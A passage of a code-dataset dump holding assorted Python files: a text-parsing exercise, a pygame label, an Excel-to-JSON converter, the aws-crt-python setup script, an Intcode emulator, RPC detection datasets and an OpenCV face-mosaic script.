+{"seq_id":"441473767","text":"from io import TextIOWrapper\nimport os\nimport sys\nfrom collections import Counter\nimport re\n\n\nclass Parser(object):\n def __init__(self,in_dir:str,out_dir:str) -> None:\n self.__input_dir = in_dir\n self.__output_dir = out_dir\n self.__f = TextIOWrapper\n self.__countTo = int()\n self.__countIng = int()\n self.__list = list()\n self.__unique_list = list()\n self.__dict = dict()\n\n self.__list_of_words_in_a_file()\n \n self.__counter = Counter(self.__list)\n \n def __list_of_words_in_a_file(self):\n with open(self.__input_dir,\"r\") as self.__f:\n for i in self.__f.read().lower().replace('\\n','; ').split(' '):\n self.__list.append(str(i))\n \n def find_TO(self):\n try:\n assert len(self.__list) > 1\n for i in self.__list:\n if i.startswith(\"to\"):\n self.__countTo += 1\n print(f\"The number of words having prefix with \\\"To\\\" in the input file = {self.__countTo}\")\n except AssertionError:\n print('Passed an empty file')\n \n def find_ING(self):\n try:\n assert len(self.__list) > 1\n for i in self.__list:\n if i.endswith(\"ing\"):\n self.__countIng +=1\n print(f\"The number of words ending with \\\"ing\\\" in the input file = {self.__countIng}\")\n except AssertionError:\n print(\"Passed an empty file\")\n \n def find_max_words(self):\n try:\n assert self.__counter.most_common(1)[0][1] > 1\n print(f\"The word that was repeated maximum number of times is {self.__counter.most_common(1)[0][0]}\")\n except AssertionError:\n print(\"All words are repeated exactly once, So maximum cannot be found\")\n \n def palindrome(self):\n try:\n assert len(self.__list) > 1 \n flag = 0\n print(\"The palindrome present in the files are: \",end=' ')\n for i in self.__list:\n if i == i[::-1]:\n print(i)\n else:\n flag += 1\n if flag == len(self.__list):\n print(\"Null\")\n except AssertionError:\n print(\"Passed an empty file\")\n\n def find_unique_list(self):\n self.__unique_list = [i for i in self.__list if self.__list.count(i) == 1]\n try:\n assert len(self.__unique_list) > 0\n print(f\"Unique elements in a list are: {self.__unique_list}\",) \n except AssertionError:\n print(\"No unique elements in the file\")\n \n def word_dict(self):\n self.__dict = {self.__list[i]:self.__list.index(i) for i in self.__list }\n print(f\"word dict {self.__dict}\")\n\n def __write_output(self,open_type,r):\n try:\n with open(self.__output_dir,r) as self.__f:\n if open_type == \"vowels\":\n for i in self.__list:\n self.__f.write(\" \".join(re.split('a|e|i|o|u',i))+\",\")\n if open_type == \"capitalize3\":\n self.__f.write('\\n')\n for i in self.__list:\n if i != ';':\n temp = i[2].upper()\n self.__f.write(i[:2]+temp+i[3:]+\" \")\n if open_type == \"capitalize5\":\n self.__f.write('\\n')\n for i,j in enumerate(self.__list):\n if j != ';' and i == 5:\n self.__f.write(j.upper()+\" \")\n elif i != 5 and j != ';':\n self.__f.write(j+\" \")\n if open_type == \"-space\":\n self.__f.write('\\n')\n for j,i in enumerate(self.__list):\n if i != ';' and j != len(self.__list)-1:\n self.__f.write(i+'-')\n elif j == len(self.__list)-1:\n self.__f.write(i)\n if open_type == \"semicolon\": \n self.__f.write('\\n')\n for i in self.__list:\n self.__f.write(i)\n \n except FileNotFoundError as e:\n print(\"Exception: \",e)\n \n def splitvowels(self):\n return self.__write_output(\"vowels\",\"w+\")\n def capatilize_3_letter(self):\n return self.__write_output(\"capitalize3\",\"a+\")\n def capatilize_5_Word(self):\n return self.__write_output(\"capitalize5\",\"a+\")\n def change_blankspace(self):\n return self.__write_output(\"-space\",\"a+\")\n def split_using_semicolon(self):\n return self.__write_output(\"semicolon\",\"a+\")\n \n \n \nif __name__ == \"__main__\":\n try:\n in_dir = os.path.join(os.getcwd(),sys.argv[1])\n except FileNotFoundError as e:\n print(\"Exception: \",e)\n\n out_dir = os.path.join(os.getcwd(),sys.argv[2])\n\n p = Parser(in_dir,out_dir)\n assert isinstance(p,Parser),\"object not valid\"\n p.find_TO()\n p.find_ING()\n p.find_max_words()\n p.palindrome()\n p.find_unique_list()\n p.word_dict()\n p.splitvowels()\n p.capatilize_3_letter()\n p.capatilize_5_Word()\n p.change_blankspace()\n p.split_using_semicolon()","sub_path":"Exercise-2021-06-21/Exercise-1.py","file_name":"Exercise-1.py","file_ext":"py","file_size_in_byte":5328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"99623560","text":"import pygame\nfrom Utils.gui.FontProvider import FontProvider\nimport Utils.gui.FontProperties as Gui\n\nclass TextLabelSurface(pygame.Surface):\n def __init__(self, text, fontProperties):\n assert isinstance(fontProperties, Gui.FontProperties), \"Expected fontPropertys to by of type FontProperties.\"\n self.text = text\n self._fontProperties = fontProperties\n self.image = None \n \n def render(self, width=None):\n font = FontProvider.getFontByFileName(self._fontProperties)\n fontImage = font.render(self.text, True, self._fontProperties.Color, self._fontProperties.Background)\n if not width:\n return fontImage\n else:\n rect = fontImage.get_rect()\n self.image = pygame.Surface((width, rect.height))\n \n if self._fontProperties.Background:\n self.image.fill(self._fontProperties.Background)\n else:\n self.image.fill((1,2,3))\n self.image.set_colorkey((1,2,3))\n center = width // 2 - rect.width // 2\n self.image.blit(fontImage, (center, 0))\n return self.image\n\n\n","sub_path":"SimpleGame/SimpleGame/Src/Utils/gui/TextLabelSurface.py","file_name":"TextLabelSurface.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"650196140","text":"import xlrd\nimport json\nfrom collections import OrderedDict\nimport argparse\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--excel_path', required=True)\n parser.add_argument('--foldername', required=True)\n config = parser.parse_args()\n\n _excel = xlrd.open_workbook(config.excel_path, on_demand=False, encoding_override='cp949')\n sheet = _excel.sheet_by_name(\"Sheet1\")\n\n _json = OrderedDict()\n\n row_count = sheet.nrows\n for index in range(0, row_count):\n value = sheet.row_values(index)[0]\n string_index = str(index).zfill(4)\n key = \"./datasets/\" + config.foldername + \"/audio/Raw.\" + string_index + \".wav\"\n _json[key] = value\n\n with open(\"./datasets/\" + config.foldername + '/recognition.json', 'w') as f:\n json.dump(_json, f, indent=2, ensure_ascii=False)\n\n _excel.release_resources()\n del _excel","sub_path":"recognition/excel_to_json.py","file_name":"excel_to_json.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"68118115","text":"import setuptools\nimport os\nimport subprocess\nfrom subprocess import CalledProcessError\nimport platform\nfrom os import path\nimport sys\n\ndef is_64bit():\n if sys.maxsize > 2**32:\n return True\n\n return False\n\ndef is_32bit():\n return is_64bit() == False\n\ndef is_arm ():\n return platform.machine().startswith('arm')\n\ndef determine_cross_compile_string():\n host_arch = platform.machine()\n if (host_arch == 'AMD64' or host_arch == 'x86_64') and is_32bit() and sys.platform != 'win32':\n return '-DCMAKE_C_FLAGS=-m32'\n return ''\n\ndef determine_generator_string():\n if sys.platform == 'win32':\n vs_version = None\n prog_x86_path = os.getenv('PROGRAMFILES(x86)')\n if vs_version == None:\n if os.path.exists(prog_x86_path + '\\\\Microsoft Visual Studio\\\\2019'):\n vs_version = '16.0'\n print('found installed version of Visual Studio 2019')\n elif os.path.exists(prog_x86_path + '\\\\Microsoft Visual Studio\\\\2017'):\n vs_version = '15.0'\n print('found installed version of Visual Studio 2017')\n elif os.path.exists(prog_x86_path + '\\\\Microsoft Visual Studio 14.0'):\n vs_version = '14.0'\n print('found installed version of Visual Studio 2015')\n else:\n print('Making an attempt at calling vswhere')\n vswhere_args = ['%ProgramFiles(x86)%\\\\Microsoft Visual Studio\\\\Installer\\\\vswhere.exe', '-legacy', '-latest', '-property', 'installationVersion']\n vswhere_output = None\n\n try:\n vswhere_output = subprocess.check_output(vswhere_args, shell=True)\n except CalledProcessError as ex:\n print('No version of MSVC compiler could be found!')\n exit(1)\n\n if vswhere_output != None:\n for out in vswhere_output.split():\n vs_version = out.decode('utf-8')\n else:\n print('No MSVC compiler could be found!')\n exit(1)\n\n vs_major_version = vs_version.split('.')[0]\n\n cmake_list_gen_args = ['cmake', '--help']\n cmake_help_output = subprocess.check_output(cmake_list_gen_args)\n\n vs_version_gen_str = None\n for out in cmake_help_output.splitlines():\n trimmed_out = out.decode('utf-8').strip()\n if 'Visual Studio' in trimmed_out and vs_major_version in trimmed_out:\n print('selecting generator {}'.format(trimmed_out))\n vs_version_gen_str = trimmed_out.split('[')[0].strip()\n break\n\n if vs_version_gen_str == None:\n print('CMake does not recognize an installed version of visual studio on your system.')\n exit(1)\n\n if is_64bit():\n print('64bit version of python detected, using win64 builds')\n vs_version_gen_str = vs_version_gen_str + ' Win64'\n\n vs_version_gen_str = '-G' + vs_version_gen_str\n print('Succesfully determined generator as \\\"{}\\\"'.format(vs_version_gen_str))\n return vs_version_gen_str\n return ''\n\ngenerator_string = determine_generator_string()\ncross_compile_string = determine_cross_compile_string()\ncurrent_dir = os.path.dirname(os.path.realpath(__file__))\nshell = sys.platform.startswith('win')\n\nbuild_dir = os.path.join(current_dir, 'deps_build')\nif not os.path.exists(build_dir):\n os.mkdir(build_dir)\nos.chdir(build_dir)\n\nlib_dir = 'lib'\ndep_install_path = os.path.join(build_dir, 'install')\nif 'AWS_C_INSTALL' in os.environ:\n dep_install_path = os.getenv('AWS_C_INSTALL')\n if os.path.exists(os.path.join(dep_install_path, 'lib64')):\n lib_dir = 'lib64'\n\ndef build_dependency(lib_name):\n lib_source_dir = os.path.join(current_dir, lib_name)\n global lib_dir\n # Skip library if it wasn't pulled\n if not os.path.exists(os.path.join(lib_source_dir, 'CMakeLists.txt')):\n lib_dir = 'lib'\n return\n\n lib_build_dir = os.path.join(build_dir, lib_name)\n if not os.path.exists(lib_build_dir):\n os.mkdir(lib_build_dir)\n os.chdir(lib_build_dir)\n\n cmake_args = [\n 'cmake',\n generator_string,\n cross_compile_string,\n '-DCMAKE_PREFIX_PATH={}'.format(dep_install_path),\n '-DCMAKE_INSTALL_PREFIX={}'.format(dep_install_path),\n '-DBUILD_SHARED_LIBS=OFF',\n '-DCMAKE_INSTALL_LIBDIR={}'.format(lib_dir),\n '-DCMAKE_BUILD_TYPE=Release',\n '-DUSE_S2N_PQ_CRYPTO=OFF',\n '-DBUILD_TESTING=OFF',\n ]\n cmake_args.append(lib_source_dir)\n build_cmd = ['cmake', '--build', './', '--config', 'release', '--target', 'install']\n\n ret_code = subprocess.check_call(cmake_args, stderr=subprocess.STDOUT, shell=shell)\n ret_code = subprocess.check_call(build_cmd, stderr=subprocess.STDOUT, shell=shell)\n\n os.chdir(build_dir)\n return ret_code\n\nif sys.platform != 'darwin' and sys.platform != 'win32':\n build_dependency('s2n')\nbuild_dependency('aws-c-common')\nbuild_dependency('aws-c-io')\nbuild_dependency('aws-c-mqtt')\nbuild_dependency('aws-c-cal')\nbuild_dependency('aws-c-compression')\nbuild_dependency('aws-c-http')\n\nos.chdir(current_dir)\n\nfrom distutils.ccompiler import get_default_compiler\ncompiler_type = get_default_compiler()\n\naws_c_libs = ['aws-c-mqtt', 'aws-c-http', 'aws-c-io', 'aws-c-compression', 'aws-c-cal', 'aws-c-common']\n\ndef get_from_env(key):\n try:\n return os.environ[key]\n except:\n return \"\"\n\n# fetch the CFLAGS/LDFLAGS from env\ncflags = get_from_env('CFLAGS').split()\nldflags = get_from_env('LDFLAGS').split()\n\ninclude_dirs = [path.join(dep_install_path, 'include')]\nlibraries = list(aws_c_libs)\nlibrary_dirs = [path.join(dep_install_path, lib_dir)]\nextra_objects = []\n\nif compiler_type == 'msvc':\n #if this is old python, we need to statically link in the VS2015 CRT, the invoking script\n # already overrode the compiler environment variables so that a decent compiler is used\n # and this is C so it shouldn't really matter.\n # actually, I couldn't get this to work, leave it here commented out for future brave souls\n #if sys.version_info[0] == 2 or (sys.version_info[0] == 3 and sys.version_info[1] <= 4):\n # cflags += ['/MT']\n pass\nelse:\n cflags += ['-O3', '-Wextra', '-Werror', '-std=gnu99']\n\nif sys.platform == 'win32':\n #the windows apis being used under the hood. Since we're static linking we have to follow the entire chain down\n libraries += ['Secur32', 'Crypt32', 'Advapi32', 'BCrypt', 'Kernel32', 'Ws2_32']\nelif sys.platform == 'darwin':\n ldflags += ['-framework Security']\n include_dirs = ['/usr/local/include'] + include_dirs\n library_dirs = ['/usr/local/' + lib_dir] + library_dirs\n extra_objects = ['{}/{}/lib{}.a'.format(dep_install_path, lib_dir, lib) for lib in aws_c_libs]\nelse:\n include_dirs = ['/usr/local/include'] + include_dirs\n library_dirs = ['/usr/local/' + lib_dir] + library_dirs\n libraries += ['s2n', 'crypto', 'rt']\n aws_c_libs += ['s2n']\n\n# ensure that the child linker process gets our flags\nos.environ['LDFLAGS'] = ' '.join(ldflags)\n\n_aws_crt_python = setuptools.Extension(\n '_aws_crt_python',\n language='c',\n define_macros=[\n ('MAJOR_VERSION', '1'),\n ('MINOR_VERSION', '0'),\n ],\n include_dirs=['/usr/local/include', dep_install_path + '/include'],\n library_dirs=['/usr/local/' + lib_dir, dep_install_path + '/' + lib_dir],\n libraries=libraries,\n sources=[\n 'source/module.c',\n 'source/io.c',\n 'source/mqtt_client.c',\n 'source/mqtt_client_connection.c',\n 'source/http_client_connection.c',\n 'source/crypto.c',\n ],\n extra_objects=extra_objects,\n extra_compile_args=cflags,\n)\n\nsetuptools.setup(\n name=\"awscrt\",\n version=\"v0.2.22\",\n author=\"Amazon Web Services, Inc\",\n author_email=\"aws-sdk-common-runtime@amazon.com\",\n description=\"A common runtime for AWS Python projects\",\n url=\"https://github.com/awslabs/aws-crt-python\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Operating System :: OS Independent\",\n ],\n install_requires=[\n 'enum34 ; python_version<\"3.4\"',\n 'futures ; python_version<\"3.2\"',\n ],\n ext_modules = [_aws_crt_python],\n)\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":8491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"394655075","text":"from sys import stdin\ninput = stdin.readline\n\nN = int(input())\n\ndp = [0 for _ in range(91)]\ndp[1] = 1\ndp[2] = 1\ndp[3] = 2\n\nfor i in range(4, 91):\n dp[i] = dp[i-1] + dp[i-2]\n\nprint(dp[N])","sub_path":"pythAlgo/baekjoon/pinary_number2.py","file_name":"pinary_number2.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"648925461","text":"################################################################################\r\n# INTCODE_T.py\r\n# 2019-12-11\r\n# Mike Quigley\r\n#\r\n# This variant of the Intcode emulator runs in a threat and uses queues for I/O\r\n# It's a separate file because threads can't be started again after they stop,\r\n# so this version can't run in interactive mode like the other one.\r\n#\r\n# Will send program outputs (opcode 4) to outQ,\r\n# as well as \"END\" when the program ends\r\n#\r\n# 2019-12-13: Optional prompt for input. Will put \"P>\" on outQ\r\n# 2019-12-19: Added load function that takes a list of ints. Should be faster\r\n# than reading from file\r\n#\r\n# Opcode table:\r\n# 1: ADD A B DEST - Adds A + B, result in DEST.\r\n# 2: MUL A B DEST - Multiplies A * B, result in DEST\r\n# 3: INP DEST - Reads input to DEST\r\n# 4: OUT A - put A on output queue\r\n# 5: JNZ A B - If A is not 0, set program counter to B\r\n# 6: JEZ A B - If A is 0, set program counter to B\r\n# 7: TLT A B DEST - If A < B, store 1 in DEST. Otherwise store 0\r\n# 8: TEQ A B DEST - If A == B, store 1 in DEST. Otherwise store 0\r\n# 9: ARB A - Add A to relative base\r\n# 99: HALT\r\n################################################################################\r\nimport threading\r\nimport queue\r\n\r\nclass Intcomp_T(threading.Thread):\r\n\r\n #mem is RAM size\r\n def __init__(self, threadID, name, mem, prompt_for_input = False):\r\n threading.Thread.__init__(self)\r\n self.threadID = threadID\r\n self.name = name\r\n self.prompt_for_input = prompt_for_input\r\n self.inQ = queue.Queue() #Input queue\r\n self.outQ = queue.Queue() #Output queue\r\n self.ram = [] #Main memory\r\n self.pM = [0, 0, 0] #Parameter mode flags\r\n self.pc = 0 #Program counter\r\n self.base = 0 #Relative Base\r\n self.ram = [0 for i in range(mem)]\r\n\r\n #Load program from list of int\r\n def load(self, program):\r\n for i in range(len(program)):\r\n self.ram[i] = program[i]\r\n\r\n #Load program from file\r\n def loadfile(self, filename):\r\n file = open(filename,'r')\r\n prog = file.readline().split(',')\r\n for i in range(len(prog)):\r\n self.ram[i] = int(prog[i])\r\n file.close()\r\n\r\n #Fetch value from RAM. Behaviour governed by mode flag\r\n def fetch(self, param):\r\n if self.pM[param - 1] == 0:\r\n return self.ram[self.ram[self.pc + param]]\r\n elif self.pM[param - 1] == 1:\r\n return self.ram[self.pc + param]\r\n elif self.pM[param - 1] == 2:\r\n return self.ram[self.ram[self.pc + param] + self.base]\r\n\r\n #Writes value to RAM. Behaviour governed by mode flag\r\n def write(self, param, value):\r\n if self.pM[param - 1] == 0:\r\n self.ram[self.ram[self.pc+param]] = value\r\n elif self.pM[param - 1] == 2:\r\n self.ram[self.ram[self.pc+param] + self.base] = value\r\n\r\n #Run program\r\n def run(self):\r\n halt = False\r\n self.pc = 0\r\n op = 0\r\n while not halt:\r\n op = self.ram[self.pc] % 100\r\n self.pM[0] = (self.ram[self.pc] // 100) % 10\r\n self.pM[1] = (self.ram[self.pc] // 1000) % 10\r\n self.pM[2] = (self.ram[self.pc] // 10000) % 10\r\n if op == 1:\r\n self.write(3, self.fetch(1) + self.fetch(2))\r\n self.pc += 4\r\n elif op == 2:\r\n self.write(3, self.fetch(1) * self.fetch(2))\r\n self.pc += 4\r\n elif op == 3:\r\n if self.prompt_for_input:\r\n self.outQ.put('P>')\r\n self.write(1, self.inQ.get(True))\r\n self.pc += 2\r\n elif op == 4:\r\n self.outQ.put(self.fetch(1))\r\n self.pc += 2\r\n elif op == 5:\r\n self.pc = self.fetch(2) if self.fetch(1) != 0 else self.pc + 3\r\n elif op == 6:\r\n self.pc = self.fetch(2) if self.fetch(1) == 0 else self.pc + 3\r\n elif op == 7:\r\n self.write(3, 1 if self.fetch(1) < self.fetch(2) else 0)\r\n self.pc += 4\r\n elif op == 8:\r\n self.write(3, 1 if self.fetch(1) == self.fetch(2) else 0)\r\n self.pc += 4\r\n elif op == 9:\r\n self.base += self.fetch(1)\r\n self.pc += 2\r\n elif op == 99:\r\n self.outQ.put(\"END\")\r\n halt = True\r\n else:\r\n print(\"ERROR UNKNOWN OPCODE\", op, \"AT ADDR\", self.pc)\r\n self.outQ.put(\"END\")\r\n halt = True\r\n","sub_path":"INTCODE_T.py","file_name":"INTCODE_T.py","file_ext":"py","file_size_in_byte":4683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"73218221","text":"##example code : https://colab.research.google.com/drive/17yT2RUKvNENVYZu9hq-q0s-hK7wZX6WA?usp=sharing\n#no context manager is used so we will need to close manually\n\nimport tempfile\nf=tempfile.NamedTemporaryFile(\"w+b\", prefix =\"StevesnamePrefix\",suffix=\".txt\")\nf.write(\"this could be a json in string format\".encode())\n#this next bits seeks the start of the text to read.\nf.seek(0)\n#read the context\nprint(f.read())\n\nfilename = f.name\nprint(filename)\nf.close()\n","sub_path":"tempfile_example.py","file_name":"tempfile_example.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"361584017","text":"import glob\nimport json\nimport os\nimport random\nfrom collections import defaultdict\n\nimport numpy as np\nimport torch\nimport torch.utils.data\nfrom PIL import Image\n\nfrom maskrcnn_benchmark.structures.bounding_box import BoxList\nfrom maskrcnn_benchmark.structures.segmentation_mask import Heatmap\nfrom maskrcnn_benchmark.utils.density import generate_density_map, rpc_category_to_super_category\n\nDENSITY_MAP_WIDTH = 100\nDENSITY_MAP_HEIGHT = 100\n\n\n# --------------------------------------------\n# ----------------Test dataset----------------\n# --------------------------------------------\nclass RPCTestDataset(torch.utils.data.Dataset):\n def __init__(self, images_dir, ann_file, transforms=None):\n self.transforms = transforms\n self.images_dir = images_dir\n self.ann_file = ann_file\n\n with open(self.ann_file) as fid:\n data = json.load(fid)\n\n annotations = defaultdict(list)\n images = []\n for image in data['images']:\n images.append(image)\n for ann in data['annotations']:\n bbox = ann['bbox']\n x, y, w, h = bbox[0], bbox[1], bbox[2], bbox[3]\n annotations[ann['image_id']].append((ann['category_id'], x, y, w, h))\n\n self.images = images\n self.annotations = dict(annotations)\n\n def __getitem__(self, index):\n image_id = self.images[index]['id']\n img_path = os.path.join(self.images_dir, self.images[index]['file_name'])\n img = Image.open(img_path).convert(\"RGB\")\n width, height = img.size[0], img.size[1]\n boxes = []\n labels = []\n ann = self.annotations[image_id]\n for category, x, y, w, h in ann:\n boxes.append([x, y, x + w, y + h])\n labels.append(category)\n\n target = BoxList(torch.tensor(boxes, dtype=torch.float32), (width, height), mode=\"xyxy\")\n target.add_field('labels', torch.tensor(labels))\n target = target.clip_to_image(remove_empty=True)\n\n if self.transforms is not None:\n img, target = self.transforms(img, target)\n\n return img, target, index\n\n def get_annotation(self, image_id):\n ann = self.annotations[image_id]\n return ann\n\n def __len__(self):\n return len(self.images)\n\n def get_img_info(self, index):\n image = self.images[index]\n return {\"height\": image['height'], \"width\": image['width'], \"id\": image['id'], 'file_name': image['file_name']}\n\n\n# --------------------------------------------\n# ----------------Train dataset---------------\n# --------------------------------------------\nclass RPCDataset(torch.utils.data.Dataset):\n def __init__(self,\n images_dir,\n ann_file,\n use_density_map=False,\n rendered=False,\n transforms=None):\n self.images_dir = images_dir\n self.ann_file = ann_file\n self.use_density_map = use_density_map\n self.rendered = rendered\n self.transforms = transforms\n self.density_categories = 1\n self.density_map_stride = 1.0 / 8\n self.density_min_sigma = 1.0\n\n self.scale = 1.0\n self.ext = '.jpg'\n self.image_size = 1815\n\n if self.rendered: # Rendered image is 800*800 and format is png\n self.scale = 800.0 / 1815.0\n self.ext = '.png'\n self.image_size = 800\n\n with open(self.ann_file) as fid:\n self.annotations = json.load(fid)\n\n def __getitem__(self, index):\n ann = self.annotations[index]\n image_id = ann['image_id']\n image_name = os.path.splitext(image_id)[0]\n img_path = os.path.join(self.images_dir, image_name + self.ext)\n img = Image.open(img_path).convert(\"RGB\")\n width, height = img.size[0], img.size[1]\n boxes = []\n labels = []\n objects = ann['objects']\n for item in objects:\n category = item['category_id']\n x, y, w, h = item['bbox']\n boxes.append([x * self.scale, y * self.scale, (x + w) * self.scale, (y + h) * self.scale])\n labels.append(category)\n\n target = BoxList(torch.tensor(boxes, dtype=torch.float32), (width, height), mode=\"xyxy\")\n target.add_field('labels', torch.tensor(labels))\n\n if self.use_density_map:\n image_size = self.image_size\n size = int(self.density_map_stride * 800)\n num_classes = self.density_categories\n assert img.width == image_size\n assert img.height == image_size\n super_categories = [rpc_category_to_super_category(category, num_classes) for category in labels]\n density_map = generate_density_map(super_categories, boxes,\n scale=size / image_size,\n size=size, num_classes=num_classes,\n min_sigma=self.density_min_sigma)\n target.add_field('heatmap', Heatmap(torch.from_numpy(density_map)))\n\n target = target.clip_to_image(remove_empty=True)\n if self.transforms is not None:\n img, target = self.transforms(img, target)\n\n return img, target, index\n\n def __len__(self):\n return len(self.annotations)\n\n def get_img_info(self, index):\n image_size = 800 if self.rendered else 1815\n return {\"height\": image_size, \"width\": image_size}\n\n\nclass RPCPseudoDataset(torch.utils.data.Dataset):\n\n def __init__(self, images_dir, ann_file=None, use_density_map=False, annotations=None, transforms=None):\n self.images_dir = images_dir\n self.ann_file = ann_file\n self.use_density_map = use_density_map\n self.transforms = transforms\n self.density_categories = 1\n self.density_map_stride = 1.0 / 8\n self.density_min_sigma = 1.0\n\n if annotations is not None:\n self.annotations = annotations\n else:\n with open(self.ann_file) as fid:\n annotations = json.load(fid)\n self.annotations = annotations\n\n print('Valid annotations: {}'.format(len(self.annotations)))\n\n def __getitem__(self, index):\n ann = self.annotations[index]\n img_path = os.path.join(self.images_dir, ann['file_name'])\n img = Image.open(img_path).convert(\"RGB\")\n width, height = img.size[0], img.size[1]\n boxes = []\n labels = []\n for category, x, y, w, h in ann['bbox']:\n boxes.append([x, y, x + w, y + h])\n labels.append(category)\n\n target = BoxList(torch.tensor(boxes, dtype=torch.float32), (width, height), mode=\"xyxy\")\n target.add_field('labels', torch.tensor(labels))\n target = target.clip_to_image(remove_empty=True)\n if self.use_density_map:\n size = int(800 * self.density_map_stride)\n image_size = img.width # Test images are squares, except 20180824-14-36-38-430.jpg(1860x1859)\n num_classes = self.density_categories\n super_categories = [rpc_category_to_super_category(category, self.density_categories) for category in labels]\n density_map = generate_density_map(super_categories, boxes,\n scale=size / image_size,\n size=size,\n num_classes=num_classes,\n min_sigma=self.density_min_sigma)\n target.add_field('heatmap', Heatmap(torch.from_numpy(density_map)))\n\n if self.transforms is not None:\n img, target = self.transforms(img, target)\n\n return img, target, index\n\n def __len__(self):\n return len(self.annotations)\n\n def get_img_info(self, index):\n ann = self.annotations[index]\n return {\"height\": ann['height'], \"width\": ann['width'], \"id\": ann['id'], 'file_name': ann['file_name']}\n\n\nclass RPCInstanceSelectDataset(torch.utils.data.Dataset):\n\n def __init__(self, images_dir, ann_file, transforms=None):\n self.images_dir = images_dir\n self.ann_file = ann_file\n self.transforms = transforms\n self.images_dir = images_dir\n self.threshold = 0.95\n\n with open(self.ann_file) as fid:\n annotations = json.load(fid)\n\n delete_keys = []\n total_objects = 0\n filtered_objects = 0\n annotation_dict = defaultdict(list)\n for annotation in annotations:\n annotation_dict[annotation['image_id']].append(annotation)\n for image_id in annotation_dict:\n count = 0\n for obj in annotation_dict[image_id]:\n total_objects += 1\n if obj['score'] > self.threshold:\n filtered_objects += 1\n count += 1\n if count == 0:\n delete_keys.append(image_id)\n\n with open('/data7/lufficc/rpc/instances_test2019.json') as fid:\n data = json.load(fid)\n\n images = []\n for image in data['images']:\n if image['id'] not in delete_keys:\n images.append(image)\n\n for image_id in delete_keys:\n del annotation_dict[image_id]\n\n self.annotations = dict(annotation_dict)\n self.images = images\n assert len(self.images) == len(self.annotations)\n\n print('Valid annotations: {}'.format(len(self.annotations)))\n print('Ratio: {:.3f}({}/{})'.format(filtered_objects / total_objects, filtered_objects, total_objects))\n\n def __getitem__(self, index):\n ann = self.annotations[self.images[index]['id']]\n img_path = os.path.join(self.images_dir, self.images[index]['file_name'])\n img = Image.open(img_path).convert(\"RGB\")\n width, height = img.size[0], img.size[1]\n boxes = []\n labels = []\n viz = False\n for obj in ann:\n if obj['score'] > self.threshold:\n category = obj['category_id']\n x, y, w, h = obj['bbox']\n boxes.append([x, y, x + w, y + h])\n labels.append(category)\n else:\n x, y, w, h = [round(k) for k in obj['bbox']]\n img = np.array(img)\n img[y:y + h, x:x + w, :] = (164, 166, 164)\n img = Image.fromarray(img, mode='RGB')\n if viz:\n import matplotlib.pyplot as plt\n plt.imshow(img)\n plt.show()\n quit()\n\n target = BoxList(torch.tensor(boxes, dtype=torch.float32), (width, height), mode=\"xyxy\")\n target.add_field('labels', torch.tensor(labels))\n target = target.clip_to_image(remove_empty=True)\n\n if self.transforms is not None:\n img, target = self.transforms(img, target)\n\n return img, target, index\n\n def __len__(self):\n return len(self.images)\n\n def get_img_info(self, index):\n ann = self.images[index]\n return ann\n\n\nclass ImagesDataset(torch.utils.data.Dataset):\n def __init__(self, transforms=None):\n self.folder = '/data7/lufficc/rpc/train2019/'\n self.paths = glob.glob(os.path.join(self.folder, '*.jpg'))\n random.shuffle(self.paths)\n self.transforms = transforms\n\n def __getitem__(self, index):\n path = self.paths[index]\n img = Image.open(path).convert('RGB')\n width, height = img.size[0], img.size[1]\n boxes = np.zeros([0, 4], dtype=np.float32)\n target = BoxList(torch.tensor(boxes, dtype=torch.float32), (width, height), mode=\"xyxy\")\n if self.transforms:\n img, _ = self.transforms(img, target)\n\n return img, target, index\n\n def __len__(self):\n return len(self.paths)\n","sub_path":"dpsnet/maskrcnn_benchmark/data/datasets/rpc_back.py","file_name":"rpc_back.py","file_ext":"py","file_size_in_byte":11768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"322667857","text":"# 이미지 모자이크\r\nimport cv2\r\n\r\ncascade_file = \"haarcascade_frontalface_default.xml\"\r\ncascade = cv2.CascadeClassifier(cascade_file)\r\n\r\n# image_file = './data/face1.jpg'\r\nimage_file = './data/face2.jpg'\r\n\r\nimage = cv2.imread(image_file)\r\nimage_gs = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\nface_list = cascade.detectMultiScale(image_gs, scaleFactor=1.1,\r\n minNeighbors=1, minSize=(100, 100))\r\n\r\nif len(face_list) == 0:\r\n print(\"No face\")\r\n quit()\r\n\r\nmosaic_rate = 20\r\n\r\nprint(face_list)\r\ncolor = (0, 0, 255)\r\n\r\nfor (x, y, w, h) in face_list:\r\n face_img = image[y:y+h, x:x+w]\r\n face_img = cv2.resize(face_img, (w//mosaic_rate, h//mosaic_rate))\r\n face_img = cv2.resize(face_img, (w, h), \r\n interpolation=cv2.INTER_AREA) # 같은 색으로 채우기\r\n image[y:y+h, x:x+w] = face_img\r\n\r\ncv2.imshow(\"image\", image)\r\ncv2.waitKey()\r\ncv2.destroyAllWindows()\r\n","sub_path":"03. OpenCV-example/face/ex02.py","file_name":"ex02.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"12164216","text":"\"\"\"\n\nCommand line script to perform prediction in 3D\n\n\"\"\"\n\n\nimport os\nimport sys\nimport numpy as np\nfrom tqdm import tqdm\nimport json \nimport argparse\nimport pprint \nimport pathlib\nimport warnings\n\ndef main():\n parser = 